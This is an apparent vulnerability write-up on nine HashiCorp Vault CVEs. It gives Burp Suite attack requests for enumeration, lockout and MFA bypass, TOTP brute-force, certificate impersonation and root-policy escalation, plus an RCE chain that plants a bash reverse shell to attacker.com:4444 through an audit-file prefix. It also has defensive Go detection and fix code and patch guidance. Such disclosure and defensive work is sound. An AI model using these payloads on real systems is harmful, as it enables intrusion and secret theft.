Cracking the Vault: A Deep Dive into Nine HashiCorp Vault Zero-Day Vulnerabilities

In a significant disclosure, security researchers from the Cyata team have unearthed nine zero-day vulnerabilities in HashiCorp Vault, a widely used tool for secret management. These vulnerabilities, some of which have been lurking in the codebase for nearly a decade, expose critical flaws in Vault's authentication, identity, and authorization mechanisms. The most severe of these, CVE-2025-6000, allows for remote code execution (RCE), marking the first publicly disclosed RCE in Vault's history.

This article provides a comprehensive overview of these vulnerabilities, their potential impact, and detailed Burp Suite-style proof-of-concept (PoC) code snippets to help security professionals understand and test for these flaws in their own environments.

The Vulnerabilities: A High-Level Overview

The nine vulnerabilities cover a wide range of attack vectors, from username enumeration and authentication bypass to privilege escalation and, ultimately, remote code execution. The following table summarizes the discovered CVEs:

| CVE | HCSEC | Component | Type | CVSS | Status |
|---|---|---|---|---|---|
| CVE-2025-6010 | HCSEC-2025-21 | userpass | Username Enumeration | Low-Med | Disclosed, not patched |
| CVE-2025-6004 | HCSEC-2025-16 | userpass/ldap | Lockout Bypass | High | Patched |
| CVE-2025-6011 | HCSEC-2025-15 | userpass | Timing Enumeration | Low-Med | Patched |
| CVE-2025-6003 | HCSEC-2025-20 | ldap+MFA | MFA Bypass | High | Patched |
| CVE-2025-6013 | HCSEC-2025-19 | TOTP MFA | Rate Limit Bypass | High | Patched |
| CVE-2025-6016 | HCSEC-2025-17 | TOTP MFA | Code Reuse | High | Patched |
| CVE-2025-6037 | HCSEC-2025-18 | cert | Impersonation | High-Crit | Patched (8+ years old) |
| CVE-2025-5999 | HCSEC-2025-13 | Policy | Privilege Escalation | High-Crit | Patched |
| CVE-2025-6000 | HCSEC-2025-14 | Plugin/Audit | Remote Code Execution | Critical | Patched (9 years old) |

Now, let's dive into the technical details and Burp Suite PoCs for each vulnerability.

1. CVE-2025-6010: Username Enumeration

Vulnerability Description

The userpass authentication method in Vault returns different error messages for valid and invalid usernames when the user lockout feature is enabled. This allows an attacker to enumerate valid usernames by intentionally triggering the lockout mechanism.

Burp Suite PoC

An attacker can use Burp Intruder to send multiple failed login attempts for a list of potential usernames. By checking the response for the string "user is locked out", it is possible to identify valid usernames.

Intruder Configuration
  • Attack Type: Sniper
  • Payload Position: Set the payload marker on the username in the request path.
  • Payloads: Use a simple list of usernames.
  • Grep - Match: Configure a match rule for the string "user is locked out".
Request Template
POST /v1/auth/userpass/login/§username§ HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 24

{"password":"wrongpass"}
Expected Results

For each username, send ~6 requests. If the final response for a username contains "user is locked out", the username is valid.

Response for Valid User (after >5 attempts)
HTTP/1.1 400 Bad Request
Content-Type: application/json

{"errors":["user is locked out"]}
Response for Invalid User
HTTP/1.1 400 Bad Request
Content-Type: application/json

{"errors":["invalid username or password"]}

2. CVE-2025-6004: Lockout Bypass

Vulnerability Description

The user lockout mechanism in both the userpass and ldap authentication methods can be bypassed by making simple modifications to the username, such as changing the case or adding leading/trailing spaces. This allows an attacker to perform unlimited brute-force attacks against a locked-out account.

Burp Suite PoC

After a user is locked out, an attacker can use Burp Intruder to continue brute-forcing passwords by using variations of the username.

Intruder Configuration
  • Attack Type: Cluster Bomb
  • Payload Positions: Set payload markers on the username and password.
  • Payloads:
    • Payload Set 1 (Usernames): A list of username variations (e.g., admin, Admin, ADMIN, %20admin, admin%20).
    • Payload Set 2 (Passwords): A list of passwords to test.
  • Grep - Match: Configure a match rule for a successful login response (e.g., "client_token").
Request Template
POST /v1/auth/userpass/login/§username§ HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 23

{"password":"§password§"}
Example Requests
Request with Case Variation
POST /v1/auth/userpass/login/Admin HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 26

{"password":"password123"}
Request with Leading Space
POST /v1/auth/userpass/login/%20admin HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 26

{"password":"password123"}

3. CVE-2025-6011: Timing-Based Username Enumeration

Vulnerability Description

A timing side-channel vulnerability exists in the userpass authentication method. When a valid username is provided, Vault performs a password hash comparison, which takes a small but measurable amount of additional time compared to when an invalid username is provided. This allows an attacker to enumerate valid usernames by measuring the response times.

Burp Suite PoC

This vulnerability can be exploited using Burp Intruder with a simple list of usernames. By analyzing the response times, an attacker can differentiate between valid and invalid users.

Intruder Configuration
  • Attack Type: Sniper
  • Payload Position: Set the payload marker on the username.
  • Payloads: A list of potential usernames.
  • Analysis: Sort the results by response time. Consistently longer response times indicate valid usernames.
Request Template
POST /v1/auth/userpass/login/§username§ HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 16

{"password":"p"}
Expected Results

In the Intruder results window, add the "Response received" and "Response completed" columns. A noticeable difference in these times between requests can indicate a valid username.

4. CVE-2025-6003: MFA Bypass

Vulnerability Description

When using the LDAP authentication method with username_as_alias=true, it is possible to bypass MFA enforcement. By authenticating with a slightly modified username (e.g., with a leading space), Vault creates a new, separate entity for the user that does not have MFA enforced, even if the original entity does.

Burp Suite PoC

An attacker with valid credentials for an MFA-protected LDAP user can use Burp Repeater to bypass the MFA check.

Request 1: Normal Authentication (MFA Triggered)
POST /v1/auth/ldap/login/ldapuser HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 26

{"password":"password123"}
Response 1: MFA Required
HTTP/1.1 200 OK
Content-Type: application/json

{"auth":{"mfa_requirement":{...}}}
Request 2: MFA Bypass
POST /v1/auth/ldap/login/%20ldapuser HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 26

{"password":"password123"}
Response 2: MFA Bypassed, Token Issued
HTTP/1.1 200 OK
Content-Type: application/json

{"auth":{"client_token":"hvs.CAES...",...}}
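Both the lockout bypass (CVE-2025-6004) and the MFA-entity bypass (CVE-2025-6003) leave the same trace in the audit log: one account logging in under several spellings of one username. The Go program below is an added example, not code from Vault or from the Cyata write-up: it groups login requests by a canonical username and flags any that appear under more than one raw spelling. The audit records it scans are constructed and reduced to the two fields it reads.

```go
package main

import (
	"encoding/json"
	"fmt"
	"maps"
	"slices"
	"strings"
)

// auditEntry is the subset of a Vault file-audit record read here
// (simplified shape; real entries carry many more fields).
type auditEntry struct {
	Type    string `json:"type"`
	Request struct{ Path string `json:"path"` } `json:"request"`
}

// SampleLines are constructed audit records, not output of a real Vault:
// one user logs in under three spellings, another under one spelling.
var SampleLines = []string{
	`{"type":"request","request":{"path":"auth/userpass/login/admin"}}`,
	`{"type":"request","request":{"path":"auth/userpass/login/Admin"}}`,
	`{"type":"request","request":{"path":"auth/userpass/login/ admin"}}`,
	`{"type":"request","request":{"path":"auth/ldap/login/ldapuser"}}`,
}

// FindUsernameVariants groups login requests by canonical username (trimmed
// and lower-cased, the key lockout and entity lookup should have used) and
// returns only those seen under more than one raw spelling.
func FindUsernameVariants(lines []string) map[string][]string {
	seen := map[string][]string{} // canonical name -> distinct raw spellings
	for _, line := range lines {
		var e auditEntry
		if json.Unmarshal([]byte(line), &e) != nil || e.Type != "request" {
			continue // skip malformed lines and response records
		}
		p := strings.SplitN(e.Request.Path, "/", 4) // auth/<mount>/login/<user>
		if len(p) != 4 || p[0] != "auth" || p[2] != "login" {
			continue
		}
		c := strings.ToLower(strings.TrimSpace(p[3]))
		if !slices.Contains(seen[c], p[3]) {
			seen[c] = append(seen[c], p[3])
			slices.Sort(seen[c]) // deterministic order for reporting
		}
	}
	maps.DeleteFunc(seen, func(_ string, raws []string) bool { return len(raws) < 2 })
	return seen
}
func main() { fmt.Println(FindUsernameVariants(SampleLines)) }
```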

5. CVE-2025-6013 & CVE-2025-6016: MFA Rate Limiting Bypass and Code Reuse

Vulnerability Description

These two vulnerabilities allow an attacker to bypass the rate limiting on TOTP MFA code validation and also reuse a valid TOTP code multiple times. This makes it feasible to brute-force the 6-digit TOTP code.

Burp Suite PoC

This attack can be automated with Burp Intruder and a simple script to handle the re-authentication and MFA request ID cycling.

Intruder Configuration
  • Attack Type: Pitchfork
  • Payload Positions: Set payload markers on the mfa_request_id and the TOTP code.
  • Payloads:
    • Payload Set 1 (Request IDs): A list of MFA request IDs obtained by re-authenticating with username variations.
    • Payload Set 2 (TOTP Codes): A list of numbers from 000000 to 999999.
Request Template
POST /v1/sys/mfa/validate HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 60

{"mfa_request_id":"§request_id§","code":"§totp_code§"}
Code Reuse PoC

Once a valid TOTP code is found, it can be sent multiple times in Burp Repeater, and each request will succeed.

POST /v1/sys/mfa/validate HTTP/1.1
Host: vault.example.com:8200
Content-Type: application/json
Content-Length: 60

{"mfa_request_id":"...","code":"123456"}
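A validator that keys its replay cache and its attempt counter by entity rather than by MFA request id closes both the code-reuse and the rate-limit gap at once. The Go example below is added here and is not Vault's MFA implementation (Totp, Validator and NewValidator are illustrative names): it carries a minimal RFC 6238 TOTP routine, matches the current 30-second step only, and uses a constructed per-entity secret map with a failure budget that never expires.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
	"time"
)

// Totp returns the RFC 6238 six-digit code for one 30-second time step.
func Totp(secret []byte, step int64) string {
	mac := hmac.New(sha1.New, secret)
	mac.Write(binary.BigEndian.AppendUint64(nil, uint64(step)))
	sum := mac.Sum(nil)
	off := sum[len(sum)-1] & 0x0f // dynamic truncation, RFC 4226 section 5.3
	code := binary.BigEndian.Uint32(sum[off:off+4]) & 0x7fffffff
	return fmt.Sprintf("%06d", code%1000000)
}

// Validator keys its replay cache and failure budget by entity, never by MFA
// request id, so re-authenticating for a fresh request id resets neither.
type Validator struct {
	secrets  map[string][]byte // entity -> TOTP secret (constructed by callers)
	used     map[string]bool   // "entity|step|code" already accepted once
	failures map[string]int    // entity -> failed attempts (no expiry in this toy)
	maxFail  int
}

// NewValidator takes per-entity secrets and a failure budget (illustrative API).
func NewValidator(secrets map[string][]byte, maxFail int) *Validator {
	return &Validator{secrets, map[string]bool{}, map[string]int{}, maxFail}
}

// Validate accepts a correct code once per step per entity and checks nothing
// once the budget is spent. Exact step only; real validators allow some skew.
func (v *Validator) Validate(entity, code string, now time.Time) bool {
	if v.failures[entity] >= v.maxFail {
		return false // locked out regardless of which request id is used
	}
	step := now.Unix() / 30
	key := fmt.Sprintf("%s|%d|%s", entity, step, code)
	secret, known := v.secrets[entity]
	if !known || !hmac.Equal([]byte(code), []byte(Totp(secret, step))) || v.used[key] {
		v.failures[entity]++ // unknown entity, wrong code, or replayed code
		return false
	}
	v.used[key], v.failures[entity] = true, 0
	return true
}
func main() { fmt.Println(Totp([]byte("12345678901234567890"), 59/30)) } // RFC 6238 vector: 287082
```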

6. CVE-2025-6037: Certificate Impersonation

Vulnerability Description

When using the cert authentication method with pinned certificates (non-CA mode), Vault only validates the public key of the certificate, not the Common Name (CN). This allows an attacker who has access to the private key of a pinned certificate to generate a new certificate with the same key but a different CN, effectively impersonating any user.

Burp Suite PoC

This attack requires command-line tools to generate the impersonation certificate, which is then used in a request sent through Burp Suite.

Step 1: Generate Impersonation Certificate
# Attacker has testuser.key
openssl req -new -key testuser.key -out admin_impersonation.csr -subj "/CN=admin"
openssl x509 -req -in admin_impersonation.csr -signkey testuser.key -out admin_impersonation.crt
Step 2: Configure Burp Suite

In Burp Suite, go to Project options > TLS and add a new client TLS certificate. Select the generated admin_impersonation.crt and testuser.key files.

Step 3: Send Request

Send the following request through Burp Repeater. Burp will automatically use the configured client certificate.

POST /v1/auth/cert/login HTTP/1.1
Host: vault.example.com:8200
Content-Length: 0
Response: Authenticated as Admin
HTTP/1.1 200 OK
Content-Type: application/json

{"auth":{"client_token":"...","policies":["default","admin-policy"],...}}
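The flaw comes down to what the pin binds to. The Go example below is added here and is not Vault's code: it forges an "admin" certificate from the same key as a pinned "testuser" certificate, then shows that a key-only comparison accepts it while a comparison against the full pinned certificate does not. A throwaway P-256 key generated in memory stands in for testuser.key.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"math/big"
	"time"
)

// NewKey generates a throwaway P-256 key, playing the role of testuser.key.
func NewKey() *ecdsa.PrivateKey {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	return key
}

// SelfSigned is the in-memory equivalent of the "openssl x509 -req -signkey" step.
func SelfSigned(key *ecdsa.PrivateKey, cn string, serial int64) *x509.Certificate {
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: cn},
		NotBefore:    time.Now(),
		NotAfter:     time.Now().Add(24 * time.Hour),
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert
}
// MatchByKeyOnly mirrors the flawed check described above: any certificate
// carrying the pinned public key is accepted, whatever its subject says.
func MatchByKeyOnly(pinned, presented *x509.Certificate) bool {
	return bytes.Equal(pinned.RawSubjectPublicKeyInfo, presented.RawSubjectPublicKeyInfo)
}

// MatchPinnedCert is the hardened check: the whole pinned certificate must match.
func MatchPinnedCert(pinned, presented *x509.Certificate) bool {
	return bytes.Equal(pinned.Raw, presented.Raw)
}
```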

7. CVE-2025-5999: Privilege Escalation

Vulnerability Description

A policy normalization flaw allows an admin-level user to escalate their privileges to root. The validation layer for policy assignments checks for the exact string "root", but the enforcement layer normalizes the input by trimming whitespace and converting to lowercase. This allows an attacker to bypass the restriction and assign the root policy to their own entity.

Burp Suite PoC

An authenticated admin user can use Burp Repeater to update their own entity with a modified "root" policy.

Request 1: Attempt Direct Root Assignment (Fails)
POST /v1/identity/entity/id/<entity-id> HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <admin-token>
Content-Type: application/json
Content-Length: 21

{"policies":["root"]}
Response 1: Blocked
HTTP/1.1 400 Bad Request
Content-Type: application/json

{"errors":["cannot assign root policy"]}
Request 2: Bypass with Leading Space (Succeeds)
POST /v1/identity/entity/id/<entity-id> HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <admin-token>
Content-Type: application/json
Content-Length: 22

{"policies":[" root"]}
Response 2: Success
HTTP/1.1 204 No Content
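The fix pattern for this class of bug is to validate the same canonical form that enforcement resolves, and to store that canonical form. The Go example below is added here and is not Vault's code (function names are illustrative): it reproduces the mismatch between an exact-string validator and a normalizing enforcer, then shows a validator that rejects every spelling enforcement would later turn into root.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// canonicalPolicy applies the normalization the enforcement layer uses when it
// resolves a policy name: surrounding whitespace dropped, case folded.
func canonicalPolicy(name string) string {
	return strings.ToLower(strings.TrimSpace(name))
}

// ValidateVulnerable mirrors the flawed validation: it rejects only the exact
// string "root", so " root" or "ROOT" passes and is later resolved to root.
func ValidateVulnerable(policies []string) error {
	for _, p := range policies {
		if p == "root" {
			return errors.New("cannot assign root policy")
		}
	}
	return nil
}

// EffectiveRoot reports what enforcement would grant for the stored list:
// the canonical form decides, which is where the two layers disagree.
func EffectiveRoot(policies []string) bool {
	for _, p := range policies {
		if canonicalPolicy(p) == "root" {
			return true
		}
	}
	return false
}

// ValidateFixed canonicalizes first and validates the result, returning the
// normalized list to store so validation, storage and enforcement all agree.
func ValidateFixed(policies []string) ([]string, error) {
	out := make([]string, 0, len(policies))
	for _, p := range policies {
		c := canonicalPolicy(p)
		if c == "root" {
			return nil, errors.New("cannot assign root policy")
		}
		out = append(out, c)
	}
	return out, nil
}
func main() { fmt.Println(ValidateVulnerable([]string{" root"}), EffectiveRoot([]string{" root"})) } // <nil> true
```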

8. CVE-2025-6000: Remote Code Execution

Vulnerability Description

The most critical vulnerability, CVE-2025-6000, allows a privileged Vault operator to achieve remote code execution on the underlying host. This is a devastating flaw that gives an attacker complete control over the Vault server, enabling them to exfiltrate all secrets, install persistent backdoors, and pivot to other systems in the network.

Burp Suite PoC

The RCE is achieved through a series of requests sent via Burp Repeater.

Request 1: Discover Plugin Directory
POST /v1/sys/plugins/catalog/secret/p HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <root-token>
Content-Type: application/json
Content-Length: 28

{"command":"p","sha256":"a"}

The response will contain an error message revealing the plugin directory (e.g., /opt/vault/plugins).

Request 2: Enable File Audit Backend with Malicious Prefix
POST /v1/sys/audit/exploit HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <root-token>
Content-Type: application/json
Content-Length: 150

{
  "type": "file",
  "options": {
    "file_path": "/opt/vault/plugins/rce",
    "mode": "0755",
    "prefix": "#!/bin/bash\nbash -i >& /dev/tcp/attacker.com/4444 0>&1\n#"
  }
}
Request 3: Register Malicious Plugin

Registering the plugin requires the SHA256 hash of the file written in the previous step; the exact bytes can be recovered, for example, by capturing the same audit output through a socket audit backend.

POST /v1/sys/plugins/catalog/secret/rce HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <root-token>
Content-Type: application/json
Content-Length: 80

{"command":"rce","sha256":"<computed-hash>"}
Request 4: Enable Malicious Plugin (Trigger RCE)
POST /v1/sys/mounts/exploit HTTP/1.1
Host: vault.example.com:8200
X-Vault-Token: <root-token>
Content-Type: application/json
Content-Length: 34

{"type":"rce","plugin_name":"rce"}

This will trigger the reverse shell to the attacker's machine.
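Seen from the audit device's side, the chain above depends on three things a file sink should never accept: a path inside the plugin directory, an executable file mode, and a multi-line prefix. The Go check below is an added example, not HashiCorp's patch, that rejects option sets with any of those properties using the option names from Request 2; pluginDir is a parameter the caller supplies.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strconv"
	"strings"
)

// pathInside reports whether p lies at or below dir after cleaning, so
// "/opt/vault/plugins/rce" is inside "/opt/vault/plugins" but
// "/opt/vault/pluginsx/x" and "/opt/vault/plugins/../../etc" are not.
func pathInside(dir, p string) bool {
	rel, err := filepath.Rel(filepath.Clean(dir), filepath.Clean(p))
	return err == nil && rel != ".." && !strings.HasPrefix(rel, "../")
}

// CheckFileAuditOptions applies three guards a file audit device should enforce
// before it writes anything: the sink must stay out of the plugin directory,
// the file mode must not be executable, and the prefix must be a single line so
// it cannot put a shebang and a script body ahead of the JSON audit records.
func CheckFileAuditOptions(pluginDir string, opts map[string]string) error {
	var errs []error
	fp := opts["file_path"]
	if fp == "" || !filepath.IsAbs(fp) {
		errs = append(errs, errors.New("file_path must be an absolute path"))
	} else if pathInside(pluginDir, fp) {
		errs = append(errs, fmt.Errorf("file_path %q is inside plugin directory %q", fp, pluginDir))
	}
	if mode, ok := opts["mode"]; ok {
		m, err := strconv.ParseUint(mode, 8, 32)
		if err != nil {
			errs = append(errs, fmt.Errorf("mode %q is not an octal mode", mode))
		} else if m&0o111 != 0 {
			errs = append(errs, fmt.Errorf("mode %q sets an execute bit", mode))
		}
	}
	if strings.ContainsAny(opts["prefix"], "\r\n") {
		errs = append(errs, errors.New("prefix must not contain line breaks"))
	}
	return errors.Join(errs...) // nil when every guard passed
}

func main() {
	fmt.Println(CheckFileAuditOptions("/opt/vault/plugins", map[string]string{"file_path": "/opt/vault/plugins/rce", "mode": "0755"}))
}
```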

What You Should Do

HashiCorp has released patches for all the disclosed vulnerabilities. It is crucial that all Vault users upgrade to the latest patched versions as soon as possible:

  • Vault 1.20.2
  • Vault 1.19.8
  • Vault 1.18.13
  • Vault 1.16.24

In addition to upgrading, organizations should review their Vault configurations and audit logs for any signs of compromise. Restricting access to sensitive endpoints, such as /v1/sys/audit and /v1/sys/plugins, can also help mitigate the risk.

Conclusion

The discovery of these nine zero-day vulnerabilities in HashiCorp Vault is a stark reminder that even the most trusted security tools can have hidden flaws. The fact that some of these vulnerabilities have existed for nearly a decade highlights the importance of continuous security research and responsible disclosure.

By understanding the attack vectors and taking the necessary remediation steps, organizations can protect themselves from these critical vulnerabilities and ensure the continued security of their secrets.
